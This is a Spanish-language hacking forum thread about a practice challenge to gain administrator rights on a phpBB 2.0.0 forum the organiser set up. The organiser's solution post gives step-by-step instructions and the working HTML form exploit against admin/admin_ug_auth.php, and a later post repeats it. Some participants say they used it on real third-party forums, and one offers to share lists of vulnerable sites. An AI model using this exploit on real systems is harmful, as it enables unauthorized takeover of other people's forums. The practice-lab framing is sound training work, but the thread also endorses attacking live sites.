Ver la versión completa : Prueba: Escalada de privilegios en phpBB 2.0.0
A ver, voy a ir haciendo cosas de estas para que vayais practicando.
La prueba no tiene ningun premio ni nada, simplemente es para que practiqueis.
Consiste en crearse un usuario, y hacer que el usuario que has creado tenga permisos de Administrador.
Normas:
- Registrarse con el mismo usuario que aquí.
- Demostrar que lo has conseguido con una captura de pantalla.
Durará 3 días la prueba esta. Después de esos 3 días borraré el phpbb.
http://usuarios.lycos.es/hhpruebas/phpbb/index.php
Primer puesto: Th3_Cr0w http://usuarios.lycos.es/hhpruebas/phpbbcr0w.jpg
Segundo puesto: Lazaro http://usuarios.lycos.es/hhpruebas/phpbblazaro.jpg
Tercer puesto: TrEKu http://usuarios.lycos.es/hhpruebas/phpbbtreku.jpg
Cuarto puesto: revolloso http://usuarios.lycos.es/hhpruebas/phpbbrevolloso.png
Quinto puesto: kerozene http://usuarios.lycos.es/hhpruebas/phpbbkerozene.gif
Sexto puesto: eXcalibur http://usuarios.lycos.es/hhpruebas/phpbbexcalibur.jpg
Séptimo puesto: 01decowar http://usuarios.lycos.es/hhpruebas/phpbb01decowar.jpg
La prueba ha finalizado!, para ver la solución ir a http://www.hackhispano.com/foro/showthread.php?s=&postid=24475&t=9618#post24475
TseTse
THE_CROW
03-12-2002, 14:36
muy buena tio. Esta tarde me registro y lo intento :D. Gracias por la prueba.
Achilipu
03-12-2002, 16:57
Buena prueba, gracias TseTse.
Quien lo consiga, podria explicar como lo hace y que pasos ha seguido, para que aprendamos todos sobre esto.
Muxas gracias tio.
¿Todavia no lo ha conseguido nadie?
Mira que es fácil.... xDD la respuesta está en google.com
Venga que es muy fácil!
TseTse
THE_CROW
03-12-2002, 18:38
si ya lo tengo. La putada es el inglés, que no hay dios que entienda el bug :D .Ahora cojo el diccionario :P
Jajaja yo ya lo tengo traducido para cuando haga la explicación.
PD. No deis pistas! xDD
TseTse
THE_CROW
03-12-2002, 18:44
te invito a un :0= si me lo pasas. Te lo cambio por la versión en inglés!! Jisjis cagüen to.
Esto empieza a funcionar....:D A ver si acabo de una vez :P
THE_CROW
03-12-2002, 19:00
yuhuuuu!! Terminado. Ahora pongo la captura de pantalla:D :D :D :D :D
Coño q no me deja subir la captura mi puta cuenta. AGGG!!!
juanma.m.d
03-12-2002, 19:31
Eyya toy registrado voy a ver, the crow please no postees la solucion todavia dame media horita hasta q me rinda o lo haga anda. toy atento:rolleyes: weno SALU2 y tse tse espero q hagas ams de estas y tengan una mayor acogida
Enseñame una captura del panel de Administración :)
Subela a cualquier lado, iespana, lycos, todos estos aceptan imágenes.
TseTse
THE_CROW
03-12-2002, 19:54
Aqui está. Por fin la subí, q asco de server x( He ganado!! Y el premio???xD
http://usuarios.lycos.es/hhpruebas/phpbbcr0w.jpg
Muy bien!
¿A que era fácil?
Has ganado un año gratis de inglés en cualquier academia Opening (a ver quien pilla el chiste) xDDD
TseTse
THE_CROW
03-12-2002, 20:10
cual de los dos chistes que lleva implícito??? Que soy un burro y necesito el inglés, o que las academias opening son más fiables que un coche de los cincuenta a 200km/h por una autopista??? :D.
Si que era fácil, si. Cuando quieras y puedas pones más que así uno aprende bastante :P
juanma.m.d
03-12-2002, 20:12
oki oye mirad a ver si es esto ...
Editado: No deis pistas! xD
Lo he copiado hasta con la publi :P. Xq oo hago y no me va
Podria ser o no ser, pruebalo y saldrás de dudas :P
TseTse
Joer, pues yo tampoco se q hago mal, pq hasta hago logout y todo antes de mandar el formul. Pero cuando intento hacer login de nuevo sigo sin tener privilegios.
:( :(
Pozi ya lo tengo!!!
:0= (solo uno q me lo merezco).
Ahora a ver si encuentro un capturador de pantallas.
Y a ver si pones + de éstas Tse-Tse, q están muy bien.
juanma.m.d
03-12-2002, 20:58
lazaro es alguna tonteria¿
no, simplemente q ya terminé.
lazaro,
Le das a el botón impr petsis del teclado y te captura la pantalla, luego con un editor de imágenes ke das a edición pegar y lo guardas como jpg o gif (nada de bmp)
TseTse
Ahora comprendo lo q decía juanma (tierra trágame!!!):D :D
Vale, ya sabeis de uno q no sabía como capturar una pantalla sin un capturador de imágenes, q triste :( :( :(
http://usuarios.lycos.es/hhpruebas/phpbblazaro.jpg
teniais razón q no era muy dificil (lo hizo alguien q no sabía ni capturar una imagen) :D
Tse-Tse gracias x la prueba, he pasado un buen rato.
Felicidades a tí también.
Procurad hacer como Th3_Cr0w (clickar en el enlace 'forums index') es para que no se vean las IPs de los concursantes.
TseTse
juanma.m.d
03-12-2002, 21:55
a mi me da igual q se sepa mi ip...
juanma.m.d
03-12-2002, 22:17
Lazaro keria decir q si es una tonteria una vez q tienes el exploit y rellenas todo bye
como diablos se utiliza un exploit???
scomo se vera soy principiante, pero me latio el aprender algo nuevo.
:( :(
THE_CROW
04-12-2002, 01:14
leete el exploit y te será muy fácil.Es verdad, yo la foto de pantalla q hice fué adrede para que se viera el menú de administrador pero no las IPs. TseTse has triunfado :D
Sorry que llego tarde pero me apunte hoy y lo vi hace un ratillo ...
Pero weno hay queda eso...
http://usuarios.lycos.es/hhpruebas/phpbbtreku.jpg
o tb pinchando aki....
Fotito_de_la_Jaikeda (http://usuarios.lycos.es/hhpruebas/phpbbtreku.jpg)
Ale Besitos y Wuen curro con la prueba.... XDD
Procurad hacer como Th3_Cr0w (clickar en el enlace 'forums index') es para que no se vean las IPs de los concursantes
Ok, de todas formas la imagen está cortada y ya me fijé en que no se vieran las IPs completas.
|NaZgÛl|
04-12-2002, 12:27
Seria bastante bueno, a mi entender que alguien se dedique a hacer este tipo de "pruebitas", pero quien es el que tiene tiempo?
Intentaré hacer alguna sobre Apache, MySLQ, o algo parecido.
No prometo nada, que estas épocas uno está ocupado, que hay que estudiar!!.
por si alguien no lo ha encontrado todavia, el exploit viene en un mensaje de la xxxxx el xx xxx es xxxxx si no me equivoco que lo vi ayer.
Editado: No dar pistas
eXcalibur
04-12-2002, 13:46
Ups, llego tarde para el juego.
CrAcKzMe
04-12-2002, 14:23
yo no tengo time ni pa hacer las pruebas ni pa resolverlas xD
Achilipu
04-12-2002, 15:07
Vale Posix, pero como encontrar ese exploit?
Cuando salio la prueba, busque en google exploits para phpbb, y encontre uno, con explicacion y todo, para la version 2, lo hice, pero no me funciono, no se que he hecho mal o si ese exploit ya no sirve.
Y ahora Posix, que dices que el bug tiene de xx xxxxxx, donde lo encuentro? He buscado en google, en xxxxxxxx, pero no encuentro nada.
Cuando termine la prueba, necesito la explicacion please.
Gracias de nuevo a TseTse por la prueba, muy buena.;)
revolloso
04-12-2002, 18:25
Puta madre, jajajja, yo hubiera sido el primero, de no haber sido por un puto error de esa madrola, jajajaj, ahora si que fue error del error, jajajaaj.
http://usuarios.lycos.es/hhpruebas/phpbbrevolloso.png
Ni pecs, me conformare con un cuarto puesto ;)
Si yo sabia que no estaba loco, lo estaba haciendo todo bien, nomas que quien sabe que pasaba, pero bueno, lo unico que hize, fue volverme a registrar y listo :D hasta hay un usuario mio tambien que es "que_caray", ese soy yo tambien, para ver si era realmente lo que pensaba, y si, asi fue.
Hay se los dejo :p
Felicidades a los dos TrEKu y revolloso!
TseTse
juanma.m.d
04-12-2002, 22:53
revolloso me diste una pista.. pero no tengo tiempo
THE_CROW
05-12-2002, 00:53
coño que es simple script kidding :D
Vale llegue tarde, apenas me estoy registrando....
Mientras preparo unas pruebas que tengo en mente, para ganar tiempo y que no esteis parados, mañana postearé una (más fácil que la del phpbb) de 'Password Cracking'. Consistirá en crackear archivos (uno de cada) de las siguientes aplicaciones:
- WinZIP
- WinRAR
- WinACE
- Adobe PDF
- Word 2000
- Excel 2000
Con esta, depende de la participación que tenga, veremos como en algunas ocasiones no es cosa de 'poténcia' sino de 'maña' o lo que es lo mismo, personas que tienen menos 'máquina' que vosotros y saca el password en menos tiempo. Por supuesto que también es cosa de suerte xD
Si alguno tiene sugeréncias para una nueva prueba (con fundamentos) que me lo diga por mensaje privado y veremos que se puede hacer.
TseTse
kerozene
05-12-2002, 05:33
Lo logre! muy bueno Tse Tse, me diverti un ratito
http://usuarios.lycos.es/hhpruebas/phpbbkerozene.gif
PD: ya estoy preparando yo un desafio para todos ustedes ;) se viene se viene ....
eXcalibur
05-12-2002, 11:39
Bueno, yo me he dado una vuelta por la red y la verdad es que caen basicamente todos los boards
http://usuarios.lycos.es/hhpruebas/phpbbexcalibur.jpg
Les pegué un toque, hay que ser buenos. jajaja
THE_CROW
05-12-2002, 13:47
a mi no me quitas los privilegios marica!!:D :D :D .
01decowar
05-12-2002, 19:26
Lastima!!! He visto tarde la prueba.
Bueno, aqui teneis mi colaboracion:
http://usuarios.lycos.es/hhpruebas/phpbb01decowar.jpg
kerozene
05-12-2002, 19:55
me perdi algun msg en el que dieron el pass? o como es que suben las imagenes a ese serv0 ?
juanma.m.d
05-12-2002, 20:00
kerozene eso es xq han obtenido privilegios de admin
kerozene
05-12-2002, 20:25
no man! consiguieron privilegio de admin del foro, no del sitio, segun veo es porque TseTse los sube y edita los posts con la nueva ubicacion
juanma.m.d
06-12-2002, 10:27
am , es q pense q a o mejor a los admins les permitian subirt cosas al server... sALU2
Pues la prueba ya se ha acabado, ahora os voy a explicar como se hacia.
El exploit fue creado por http://www.rootsecure.net y es allí donde se encuentra en versión HTML y versión PERL. Te bajabas el exploit a tu disco duro y seguias las instrucciones (traduzco del inglés al español, se da por hecho que ya te has creado el usuario):
1. Ir al foro en el que quieres cambiarte los permisos, usando el navegador.
2. Buscar el directorio base del phpBB que en la prueba era http://usuarios.lycos.es/hhpruebas/phpbb, llegados aquí, hay que editar el código html del exploit y en la parte donde pone <form method="post" action="http://www.base_url_here.com/admin/admin_ug_auth.php">
cambiarlo por; <form method="post" action="http://usuarios.lycos.es/hhpruebas/phpbb/admin/admin_ug_auth.php">.
3. Ir a la lista de miembros.
4. Buscar tu usuario ir al perfil de tu usuario y memorizar el user id que se ve en la barra del navegador concretamente la parte de "u=?", donde '?' es un número, el id del usuario.
5. Como estamos dentro de foro (hemos hecho login) tenemos que darle a logout por fuerza, sino no funcionará y nos saldrá un mensaje que no tenemos permisos.
6. Introducir tu user id en el exploit y seleccionar el nivel que deseamos tener (en este caso Administrador), dale a submit y ya está.
Os llevará a una pantalla de login que teneis que ignorar, si quereis ir a el panel de administración, hacedlo desde el enlace que hay debajo de los foros 'Go to Administration Panel'.
A continuación os pego el código del formulario, que lo teneis que guardar en HTML para poder usarlo:
<FORM action=http://usuarios.lycos.es/hhpruebas/phpbb/admin/admin_ug_auth.php
method=post>
<P>User Level : <SELECT name=userlevel> <OPTION value=admin
selected>Administrator</OPTION> <OPTION
value=user>User</OPTION></SELECT></P><INPUT type=hidden value=0 name=private[1]>
<INPUT type=hidden value=0 name=moderator[1]> <INPUT type=hidden value=user
name=mode> <INPUT type=hidden name=adv> User ID: <INPUT size=5 name=u> <BR><INPUT class=mainoption type=submit value=Submit name=submit> <INPUT class=liteoption type=reset value=Reset name=reset> </FORM>
TseTse
Si no has borrado ningun usuario es el numeor de debajo la columna # no??? joder podias dejarlo un rato mas, me akabo de poner y no funciona la page ya...:(
Si, así es. Lo dejaré hasta esta noche, aún no lo he mirado pero supongo que seguirá vivo xDD vamos que yo no he tocado nada de momento.
TseTse
Pos a mi no se me abre ya, weno desde hace hora y media, si no te kuesta mucho ponla de nuevo, sino pos na ke se le va a hacer! asias por la prueba me lo toy pasando de pm
Funciona perfectamente, pero lo voy a borrar, si quereis probarlo, os podeis bajar el phpbb que he usado yo de http://prdownloads.sourceforge.net/phpbb/phpBB-2.0.0.tar.gz?use_mirror=unc os creais una cuenta en lycos y lo instalais, así podeis hacer vustras pruebas :P
TseTse
me podrias explicar un poco mejor todo esto del phpbb i k es esto del bug?
pues es un foro programado en php de código libre (si lo buscas por el google seguro q encuentras algún sitio de donde bajártelo).
El problema q presenta, es q con un simple formulario HTML (Tse Tse te indica de donde bajarlo, sino en google viene), se pueden conseguir privilegios de administrador en el foro.
saludos
osea, para poner en practica lo dicho, hay k bajarse el phpbb?
otra cosa, ya me baje el xploit del enlace k puso tsetse, i lo k hay son muchos archivos con la extension php
los archivos ".php" son el foro.
El exploit es un archivo .html
Antes, Tse-Tse tenía colgado el foro pero creo q ya lo quitó.
unos posts + atrás:
El exploit fue creado por http://www.rootsecure.net y es allí donde se encuentra en versión HTML y versión PERL
y si no lo encuentras ahí (supongo q si pero no mire) con buscarlo en el google seguro q te aparece
muchas gracias por tu ayuda lazaro!!!!!!!
pero es k no lo acabo de entender, entonces para k sirve bajarse el foro...no dijo tsetse k era desde el navegador?
debo estar torpe estos dias, pero esto no lo acabo de entender bien, agradeceria k alguien me explicara el proceso detalladamente...
A ver, la prueba terminó y borré el foro. Por lo que si quereis practicar, teneis que bajaros el phpbb 2.0.0 e instalarlo en lycos por ejemplo y luego usar el exploit. Todo eso por vuestra cuenta.
TseTse
uNDrCraSh
23-05-2003, 02:29
bueno, por si a alguien le da por probarlo les publico el Xploit aki, no se si estara correcto, ya que no es de la pagina oficial donde lo encontro Tse Tse, un saludo
#html>
#head>
#/head>
#body>
#form method="post"
action="http://www.server.com/RUTA AL FORO/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
#option value="admin">Administrator</option>
#option value="user">User</option></select>
#input type="hidden" name="private[1]" value="0">
#input type="hidden" name="moderator[1]" value="0">
#input type="hidden" name="mode" value="user">
#input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
#input type="submit" name="submit" value="Submit">
#/form>
#/body>
#/html>
<PICCOLO>
23-05-2003, 08:16
tres o cuatro posts mas atrás lo había puesto Tse Tse
Por cierto, ya os pasaré unas cuantas direcciones con las que funciona
-salu2-
obviamente si el foro phpbb2.0.0 tiene oculto lo de ir al panel de administracion en la pagina principal, abajo del todo ,.......mmm si no lo tiene no se deberia poder acceder al panel , no ??
si estoy ekivocado please....explicarme en ke por ke sino.....hay algo ke no me cuadra
gracias
<PICCOLO>
08-07-2003, 11:22
siendo administrador puedes entrar en el menú de administración de la siguiente forma, sin necesidad de que aparezca enlace
antes de hacer login:
directorio_del_foro/admin/index.php
despues de hacer login:
debes copiar de la barra de direcciones donde pone sid= ...... lo copias y entras en la dirección:
directorio_del_foro/admin/index.php?sid=....
salu2
gracias picolo , en teoria ya se eso... pues yo tengo 2 foros xDD (vbulletin) , pero simplemente no se me ocurrio XD
ueno.... asias por la aclaracion ;)
PD: Mu buen xploit
urystation
02-08-2003, 13:30
5. Como estamos dentro de foro (hemos hecho login) tenemos que darle a logout por fuerza, sino no funcionará y nos saldrá un mensaje que no tenemos permisos.
esa parte no la entendi....me la podes explicar mejor??
ademas yolo hago todo bien...hago bien el exploit pongo el numero...,sale la pagina esa de login pero no veo el link..."go to administation panel'" .................cmo le hago?
gracias